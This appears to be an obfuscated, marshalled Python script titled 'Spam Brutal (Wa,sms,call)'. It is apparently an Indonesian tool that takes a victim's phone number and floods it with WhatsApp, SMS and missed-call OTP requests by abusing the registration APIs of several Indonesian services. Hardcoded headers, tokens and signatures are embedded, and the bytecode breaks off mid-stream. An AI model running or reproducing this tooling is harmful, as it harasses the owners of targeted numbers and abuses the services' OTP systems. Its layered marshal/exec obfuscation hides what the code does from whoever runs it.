b[1;31mz\x07\x1b[1;32mz\x07\x1b[1;33mz\x07\x1b[1;36mz\x07\x1b[1;35mz\x07\x1b[1;37mz\x02\n u\x05\x00\x00\x00\xe2\x80\xa2> z\x14What is Your Name ? \xfa\x02: \xe9\x01\x00\x00\x00\xda\x05clearz\x0f \n u7\x00\x00\x00\xe2\x96\x88\xe2\x96\x80\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83 \xe2\x80\x83uJ\x00\x00\x00\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x88\xe2\x80\x83\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80\xe2\x80\x83\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n u7\x00\x00\x00\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x80\x83 \xe2\x80\x83uJ\x00\x00\x00\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x80\x83\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\n z0==========================================\n u\x06\x00\x00\x00[\xe2\x80\xa2] z\nMessage : u\x1d\x00\x00\x00Welcome Tukang Jail\xf0\x9f\x98\x85\n z\nServer : z\x15Online \n z\nScript : z!Spam Brutal (Wa,sms,call) \n z\nVersi : z\x142.0 \n z\nAuthor : z\x15Hendar \n z\nYoutube : z\x13H20 Studio \n z\nGroup : z\x14bit.ly/3ddfT2F0\n z3========================================== \n z\x12Warning..!!\n z\x02- z\x1bGunakan dengan bijak\n z\x1eBisa merusak pertemanan\n z\x1eBisa di tampol sama orang\n z1========================================== \n \xfa\x04[>] z\nName : z\x08\n\n \xda\x011z\x02. z\x14Starting Spam\n \xda\x012u\x1d\x00\x00\x00Follow Sosmed Aink\xf0\x9f\x98\x81\n \xda\x013u\x1b\x00\x00\x00Donasi Buat Kopi\xf0\x9f\x98\x8e\n \xda\x014z\x05Exit\nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x1c\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05S\x00)\x06\xda\x04Mainc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x12\x00\x00\x00d\x01|\x00_\x00|\x00\xa0\x01\xa1\x00\x01\x00d\x00S\x00)\x02Nz\x0fHendar Official)\x02\xda\x04sanz\xda\x04main\xa9\x01\xda\x04self\xa9\x00r\x10\x00\x00\x00\xfa\x0b<H20studio>\xda\x08__init__,\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x06\x01z\rMain.__init__c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\x00\x02\x00\x00t\x00t\x01\x83\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x02t\x04\x9b\x00\x9d\x04\x83\x01}\x01t\x05d\x03\x83\x01\x01\x00t\x06\xa0\x07d\x04\xa1\x01\x01\x00|\x01d\x05k\x02s@|\x01d\x06k\x02\x90\x01r\x02t\x00d\x07t\x03\x9b\x00d\x08t\x08\x9b\x00d\tt\x03\x9b\x00d\nt\x04\x9b\x00d\x0b\x9d\t\x83\x01\x01\x00t\x05d\x03\x83\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x08t\x08\x9b\x00d\x0ct\x03\x9b\x00d\nt\x08\x9b\x00\x9d\x08\x83\x01\xa0\td\rd\x0e\xa1\x02a\nt\x05d\x0f\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x05d\x10\x83\x01\x01\x00t\nd\x0ek\x02r\xb2nNt\x0b\x83\x00\x01\x00t\x0c\x83\x00\x01\x00t\r\x83\x00\x01\x00t\x00d\x11t\x04\x9b\x00d\x12\x9d\x03\x83\x01\x01\x00|\x00\xa0\x0ed\x13\xa1\x01\x01\x00t\x0fj\x10\xa0\x11d\x14\xa1\x01\x01\x00t\x0fj\x10\xa0\x11d\x15\xa1\x01\x01\x00t\x05d\x10\x83\x01\x01\x00q\xb2n\xfa|\x01d\x16k\x02\x90\x01s\x16|\x01d\x17k\x02\x90\x01r^t\x00d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d\x19\x9d\x05\x83\x01\x01\x00t\x06\xa0\x07d\x1a\xa1\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x1bt\x08\x9b\x00d\x1c\x9d\x05\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x06\xa0\x07d\x1d\xa1\x01\x01\x00n\x9e|\x01d\x1ek\x02\x90\x01sr|\x01d\x1fk\x02\x90\x01r\xbat\x00d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d \x9d\x05\x83\x01\x01\x00t\x06\xa0\x07d!\xa1\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x1bt\x08\x9b\x00d\x1c\x9d\x05\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x06\xa0\x07d\x1d\xa1\x01\x01\x00nB|\x01d"k\x02\x90\x01s\xce|\x01d#k\x02\x90\x01r\xe6t\x12d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d$\x9d\x05\x83\x01\x01\x00n\x16t\x12d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d%\x9d\x05\x83\x01\x01\x00d\x00S\x00)&Nz\x05 z\x0e[>] Input no: g\x00\x00\x00\x00\x00\x00\xe0?z2xdg-open https://www.youtube.com/c/HendarOfficial1r\x07\x00\x00\x00Z\x0201\xfa\x06\n r\x06\x00\x00\x00z\x08Example r\x03\x00\x00\x00z\x0e+6281234567xxxz\x08Number z\x03+62\xda\x00g\xcd\xcc\xcc\xcc\xcc\xcc\x00@r\x04\x00\x00\x00\xfa\x04 z*==========================================\xe9\n\x00\x00\x00z\x1c\r \xfa\x01\rr\x08\x00\x00\x00Z\x0202\xfa\x02! z\x1aFollow Instagram Aink Ngabz2xdg-open https://www.instagram.com/hendar_scripterz\x02> z\x17Press Enter to go Back z\x0epython spam.pyr\t\x00\x00\x00Z\x0203z\nNgopi ngabz%xdg-open https://saweria.co/H20Studior\n\x00\x00\x00Z\x0204z\x12Exit This Tools..\nz\x16Option Does Not Exist\n)\x13\xda\x05print\xda\x06banner\xda\x05input\xda\x03red\xda\x06yellowr\x02\x00\x00\x00\xda\x02os\xda\x06system\xda\x05white\xda\x07replace\xda\x05nomorZ\x07sxp_sms\xda\x06sxp_wa\xda\x08sxp_call\xda\x04wait\xda\x03sys\xda\x06stdout\xda\x05write\xda\x04exit)\x02r\x0f\x00\x00\x00r\x0c\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\r\x00\x00\x000\x00\x00\x00sF\x00\x00\x00\x00\x02\x08\x01\x14\x01\x08\x01\n\x01\x12\x01"\x01\x08\x01(\x01\x08\x01\x06\x01\x08\x01\x08\x01\x02\x03\x06\x01\x06\x01\x06\x01\x10\x01\n\x01\x18\x01\x0c\x02\x14\x01\x16\x02\n\x01\x16\x01\x06\x01\x0c\x01\x14\x01\x16\x02\n\x01\x16\x01\x06\x01\x0c\x01\x14\x01\x18\x02z\tMain.mainN)\x05\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\x12\x00\x00\x00r\r\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x0b\x00\x00\x00+\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x08\x04r\x0b\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00sL\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05d\x06\x84\x00Z\x05d\x07d\x08\x84\x00Z\x06d\td\n\x84\x00Z\x07d\x0bd\x0c\x84\x00Z\x08d\rd\x0e\x84\x00Z\td\x0fd\x10\x84\x00Z\nd\x11S\x00)\x12r#\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00d\x01|\x00_\x00t\x01\xa0\x02\xa1\x00|\x00_\x03|\x00\xa0\x04\xa1\x00\x01\x00d\x00S\x00\xa9\x02Nz\rFREE TUTORIAL\xa9\x05r\x0c\x00\x00\x00\xda\x08requestsZ\x07Session\xda\x03reqr\r\x00\x00\x00r\x0e\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x12\x00\x00\x00a\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\n\x01z\x0fsxp_wa.__init__c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x11\x00\x00\x00C\x00\x00\x00sf\x00\x00\x00t\x00\xa0\x01g\x00d\x01\xa2\x01\xa1\x01}\x02t\x00\xa0\x02d\x02d\x03\xa1\x02}\x03|\x00j\x03j\x04d\x04d\x05d\x06d\x07d\x08t\x05d\td\nd\x0bd\x0cd\td\rd\x0ed\x0fd\x10d\x11\x9c\x0e|\x02t\x06|\x03\x83\x01\x17\x00d\x12|\x01\x9b\x00\x9d\x02d\x13d\x14\x9c\x03d\x15\x8d\x03j\x07}\x04d\x00S\x00)\x16N)\x04Z\x05fahmiZ\x07xzc0derZ\x07bed3bahZ\x05xmanz\xe9o\x00\x00\x00i\xe7\x03\x00\x00z(https://wong.kitabisa.com/register/draftz\x11wong.kitabisa.comZ\x03pwaz\x1chttps://account.kitabisa.comZ\n1611020248z\x051.0.0\xfa\x10application/jsonZ\x06kanvasz$107790c3-86e0-4872-9dfb-b9c5da9bfa13Z@e6b4dd627125b3ccd53de193d165c481cc7fdfef0b1dcd7a587636a008fdc89e\xfa\x053.4.0z2https://account.kitabisa.com/register/otp?type=sms\xfa#id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7)\x0e\xda\x04Hostz\x14x-ktbs-platform-name\xda\x06originz\x0bx-ktbs-time\xfa\nuser-agentz\x12x-ktbs-api-versionZ\x06acceptz\x12x-ktbs-client-namez\x11x-ktbs-request-idz\x15x-ktbs-client-versionz\x10x-ktbs-signature\xda\x07versionZ\x07refererz\x0faccept-language\xda\x010Z\x08whatsapp)\x03Z\tfull_nameZ\x08username\xda\x08otp_type\xa9\x02\xda\x07headers\xda\x04json)\x08\xda\x06randomZ\x06choiceZ\x07randintr0\x00\x00\x00\xda\x04post\xda\x05agent\xda\x03str\xda\x04text)\x05r\x0f\x00\x00\x00\xda\x02noZ\x08nickname\xda\x05angkar\x0c\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_1f\x00\x00\x00s8\x00\x00\x00\x00\x01\x04\x01\x06\xff\x04\x08\x04\x01\x02\x01\x02\xfe\x04\x04\x08\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf2\x04\x11\n\x01\x08\x01\x02\xfd\x04\xefz\x0bsxp_wa.wa_1c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x1a\x00\x00\x00|\x00j\x00\xa0\x01d\x01|\x01\x9b\x00d\x02\x9d\x03\xa1\x01j\x02}\x02d\x00S\x00)\x03Nz&https://m.redbus.id/api/getOtp?number=z\x19&cc=62&whatsAppOpted=true)\x03r0\x00\x00\x00\xda\x03getrB\x00\x00\x00\xa9\x03r\x0f\x00\x00\x00rC\x00\x00\x00r\x0c\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_2\x8b\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\n\xffz\x0bsxp_wa.wa_2c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s6\x00\x00\x00|\x00j\x00j\x01d\x01d\x02d\x03d\x04d\x05d\x06d\x07d\x08t\x02d\t\x9c\x08d\nd\x0bd\x0cd\r|\x01d\x0e\x9c\x05d\x0f\x8d\x03j\x03}\x02d\x00S\x00)\x10Nz/https://api.bukuwarung.com/api/v1/auth/otp/sendr2\x00\x00\x00r3\x00\x00\x00Z\x043399z\x1fapplication/json; charset=UTF-8z\x12api.bukuwarung.comz\nKeep-AliveZ\x04gzip)\x08\xda\x06Acceptz\x12X-APP-VERSION-NAMEz\x12X-APP-VERSION-CODE\xfa\x0cContent-Typer5\x00\x00\x00\xda\nConnection\xfa\x0fAccept-Encoding\xfa\nUser-AgentZ\tLOGIN_OTP\xda\x0262z$00000177-142d-f1a2-bac4-57a9039fdc4dZ\x02WA)\x05\xda\x06actionZ\x0bcountryCodeZ\x08deviceId\xda\x06method\xda\x05phoner;\x00\x00\x00\xa9\x04r0\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rB\x00\x00\x00rG\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_3\x90\x00\x00\x00s"\x00\x00\x00\x00\x01\x08\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x04\x0b\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x04\xf5z\x0bsxp_wa.wa_3c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s(\x00\x00\x00|\x00j\x00j\x01d\x01d\x02t\x02i\x01d\x03|\x01\x9b\x00\x9d\x02d\x04d\x05\x9c\x02d\x06\x8d\x03j\x03}\x02d\x00S\x00)\x07Nz+https://evermos.com/api/client/request-coder7\x00\x00\x00rN\x00\x00\x00r\x01\x00\x00\x00)\x02Z\ttelephone\xda\x04type\xa9\x02r<\x00\x00\x00\xda\x04datarR\x00\x00\x00rG\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_4\xa5\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x08\x02\x04\xff\x02\x04\x08\x01\x02\xfe\x04\xfcz\x0bsxp_wa.wa_4c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00sH\x00\x00\x00|\x00j\x00j\x01d\x01d\x02d\x03d\x04d\x05d\x05d\x06t\x02d\x07d\x07d\x08d\td\nd\x0bd\x0c\x9c\rd\r|\x01\x9b\x00\x9d\x02d\x0ed\x0fd\x10d\rd\x11d\x12\x9c\x06d\x13\x8d\x03j\x03}\x02d\x00S\x00)\x14Nz+https://wapi.ruparupa.com/auth/generate-otpz\x11wapi.ruparupa.com\xfa\nkeep-alivez\xc4eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZlY2VjZmYtZTQ1Zi00MTVmLWI2M2UtMmJiMzUyZmQ2NzhkIiwiaWF0IjoxNTkzMDIyNDkyLCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.fETKXQ0KyZdksWWsjkRpjiKLrJtZWmtogKyePycoF0Er2\x00\x00\x00Z\x03odiZ\x06mobilez\x16https://m.ruparupa.comz4https://m.ruparupa.com/verification?page=otp-choicesz\x11gzip, deflate, brr4\x00\x00\x00)\rr5\x00\x00\x00rK\x00\x00\x00Z\rAuthorizationrI\x00\x00\x00rJ\x00\x00\x00z\x0eX-Company-NamerM\x00\x00\x00z\ruser-platformz\x0fX-Frontend-Type\xda\x06OriginZ\x07RefererrL\x00\x00\x00z\x0fAccept-Languager9\x00\x00\x00\xda\x08register\xda\x07messager\x14\x00\x00\x00r\x01\x00\x00\x00)\x06rQ\x00\x00\x00rO\x00\x00\x00Z\x07channel\xda\x05emailZ\x0bcustomer_idZ\tis_resendr;\x00\x00\x00rR\x00\x00\x00rG\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_5\xb0\x00\x00\x00s.\x00\x00\x00\x00\x01\x08\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf3\x04\x10\x08\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfa\x04\xf0z\x0bsxp_wa.wa_5c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sn\x00\x00\x00d\x01d\x02d\x03d\x04t\x00d\x05d\x06d\x07\x9c\x07}\x02|\x00j\x01j\x02d\x08|\x01\x17\x00d\t\x17\x00|\x02d\n\x8d\x02j\x03}\x03t\x04\xa0\x05d\x0b|\x03\xa1\x02\xa0\x06d\x0c\xa1\x01}\x04d\r|\x01|\x04d\x0ed\x0ed\x0ed\x0ed\x0fd\x10\x9c\x08}\x05|\x00j\x01j\x07d\x11|\x02|\x05d\x12\x8d\x03j\x03}\x06d\x00S\x00)\x13NrX\x00\x00\x00z.application/json, text/javascript, */*; q=0.01z\x1ehttps://accounts.tokopedia.comZ\x0eXMLHttpRequestz0application/x-www-form-urlencoded; charset=UTF-8z\rgzip, deflate)\x07rK\x00\x00\x00rI\x00\x00\x00rY\x00\x00\x00z\x10X-Requested-WithrM\x00\x00\x00rJ\x00\x00\x00rL\x00\x00\x00z>https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn=z\xab&ld=https%3A%2F%2Faccounts.tokopedia.com%2Fregister%3Ftype%3Dphone%26phone%3D{}%26status%3DeyJrIjp0cnVlLCJtIjp0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ%253D%253D\xa9\x01r<\x00\x00\x00z<\\<input\\ id\\=\\"Token\\"\\ value\\=\\"(.*?)\\"\\ type\\=\\"hidden\\"\\>r\x04\x00\x00\x00Z\x03116r\x14\x00\x00\x00\xda\x016)\x08r:\x00\x00\x00Z\x06msisdnZ\x02tkr\\\x00\x00\x00Z\x0eoriginal_paramZ\x07user_idZ\tsignatureZ\x10number_otp_digitz4https://accounts.tokopedia.com/otp/c/ajax/request-warU\x00\x00\x00)\x08r@\x00\x00\x00r0\x00\x00\x00rF\x00\x00\x00rB\x00\x00\x00\xda\x02re\xda\x06search\xda\x05groupr?\x00\x00\x00)\x07r\x0f\x00\x00\x00rC\x00\x00\x00r<\x00\x00\x00Z\x04sitera\x00\x00\x00rV\x00\x00\x00r\x0c\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04wa_6\xcb\x00\x00\x00s,\x00\x00\x00\x00\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf9\x06\t\x1a\x01\x12\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x06\n\x06\x01\x06\xffz\x0bsxp_wa.wa_6c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sL\x00\x00\x00|\x00\xa0\x00t\x01\xa1\x01\x01\x00|\x00\xa0\x02t\x01\xa1\x01\x01\x00|\x00\xa0\x03t\x01\xa1\x01\x01\x00|\x00\xa0\x04t\x01\xa1\x01\x01\x00|\x00\xa0\x05t\x01\xa1\x01\x01\x00t\x06d\x01t\x07\x9b\x00d\x02t\x08\x9b\x00d\x03\x9d\x05\x83\x01\x01\x00d\x00S\x00)\x04Nr\x15\x00\x00\x00\xf5\x04\x00\x00\x00\xe2\x9c\x93 z\x19Successfully Send Spam Wa)\trH\x00\x00\x00r"\x00\x00\x00rS\x00\x00\x00rW\x00\x00\x00r]\x00\x00\x00rc\x00\x00\x00r\x19\x00\x00\x00\xda\x05greenr \x00\x00\x00r\x0e\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\r\x00\x00\x00\xe5\x00\x00\x00s\x0c\x00\x00\x00\x00\x02\n\x01\n\x01\n\x01\n\x01\n\x01z\x0bsxp_wa.mainN)\x0br*\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00r\x12\x00\x00\x00rE\x00\x00\x00rH\x00\x00\x00rS\x00\x00\x00rW\x00\x00\x00r]\x00\x00\x00rc\x00\x00\x00r\r\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r#\x00\x00\x00`\x00\x00\x00s\x10\x00\x00\x00\x08\x01\x08\x05\x08%\x08\x05\x08\x15\x08\x0b\x08\x1b\x08\x1ar#\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s$\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05d\x06\x84\x00Z\x05d\x07S\x00)\x08r$\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00d\x01|\x00_\x00t\x01\xa0\x02\xa1\x00|\x00_\x03|\x00\xa0\x04\xa1\x00\x01\x00d\x00S\x00r-\x00\x00\x00r.\x00\x00\x00r\x0e\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x12\x00\x00\x00\xef\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\n\x01z\x11sxp_call.__init__c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00|\x00j\x00j\x01d\x01|\x01\x9b\x00d\x02|\x01\x9b\x00\x9d\x04d\x03t\x02i\x01d\x04\x8d\x02}\x02d\x05|\x02j\x03v\x00rBt\x04d\x06t\x05\x9b\x00d\x07t\x06\x9b\x00d\x08\x9d\x05\x83\x01\x01\x00n\x16t\x04d\x06t\x07\x9b\x00d\tt\x08\x9b\x00d\n\x9d\x05\x83\x01\x01\x00d\x00S\x00)\x0bNz(https://www.nutriclub.co.id/otp/?phone=0z\x0c&old_phone=0r7\x00\x00\x00r^\x00\x00\x00z\x19Request misscall berhasilr\x15\x00\x00\x00rd\x00\x00\x00z\x1bSuccessfully Send Spam Callr\x18\x00\x00\x00z Limit, Please try Again Tomorrow)\tr0\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rB\x00\x00\x00r\x19\x00\x00\x00re\x00\x00\x00r \x00\x00\x00r\x1c\x00\x00\x00r\x1d\x00\x00\x00rG\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x04call\xf4\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x14\x02\x04\xff\x02\xff\x06\x05\n\x01\x18\x02z\rsxp_call.callc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x0e\x00\x00\x00|\x00\xa0\x00t\x01\xa1\x01\x01\x00d\x00S\x00)\x01N)\x02rf\x00\x00\x00r"\x00\x00\x00r\x0e\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\r\x00\x00\x00\xff\x00\x00\x00s\x02\x00\x00\x00\x00\x01z\rsxp_call.mainN)\x06r*\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00r\x12\x00\x00\x00rf\x00\x00\x00r\r\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r$\x00\x00\x00\xee\x00\x00\x00s\x06\x00\x00\x00\x08\x01\x08\x05\x08\x0br$\x00\x00\x00\xda\x08__main__r\x13\x00\x00\x00r\x18\x00\x00\x00z\x12Ctrl + C Detected\nz\x1aInternet Connection Error\n)\x1br`\x00\x00\x00r&\x00\x00\x00r\x1e\x00\x00\x00r=\x00\x00\x00r/\x00\x00\x00r>\x00\x00\x00\xda\x04timer\x02\x00\x00\x00r\x1c\x00\x00\x00re\x00\x00\x00r\x1d\x00\x00\x00\xda\x04cyan\xda\x06purpler \x00\x00\x00r\x1b\x00\x00\x00\xda\x04namer\x1f\x00\x00\x00r\x1a\x00\x00\x00r\x0b\x00\x00\x00r\x19\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r*\x00\x00\x00\xda\x11KeyboardInterruptr)\x00\x00\x00Z\nexceptions\xda\x0fConnectionErrorr\x10\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00\xda\x08<module>\x04\x00\x00\x00s\x00\x01\x00\x000\x01\x0c\x02\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01 \x01\x08\x01\n\x03\x02\x01\x02\xff\x04\x01\x02\xff\x04\x02\x02\xfe\x04\x02\x02\xfe\x04\x03\x02\xfd\x04\x04\x02\xfc\x04\x04\x02\xfc\x04\x04\x02\xfc\x04\x05\x02\xfb\x04\x05\x02\xfb\x04\x05\x02\xfb\x04\x06\x02\xfa\x04\x06\x02\xfa\x04\x06\x02\xfa\x04\x07\x02\xf9\x04\x07\x02\xf9\x04\x07\x02\xf9\x04\x08\x02\xf8\x04\t\x02\xf7\x04\t\x02\xf7\x04\t\x02\xf7\x04\n\x02\xf6\x04\n\x02\xf6\x04\n\x02\xf6\x04\x0b\x02\xf5\x04\x0b\x02\xf5\x04\x0b\x02\xf5\x04\x0c\x02\xf4\x04\r\x02\xf3\x04\x0e\x02\xf2\x04\x0e\x02\xf2\x04\x0f\x02\xf1\x04\x0f\x02\xf1\x04\x10\x02\xf0\x04\x10\x02\xf0\x04\x11\x02\xef\x04\x12\x02\xee\x04\x12\x02\xee\x04\x12\x02\xee\x02\x12\x02\xee\x04\x14\x02\xec\x04\x14\x02\xec\x04\x14\x02\xec\x04\x15\x02\xeb\x04\x15\x02\xeb\x04\x15\x02\xeb\x04\x16\x02\xea\x04\x16\x02\xea\x04\x16\x02\xea\x04\x17\x02\xe9\x04\x17\x02\xe9\x04\x17\x02\xe9\x08\x19\x0e2\x06\x01\x08\x02\x0e\x7f\x00\x0f\x0e\x14\n\x01\x02\x01\n\x01\x0e\x01\x1a\x01\x12\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x0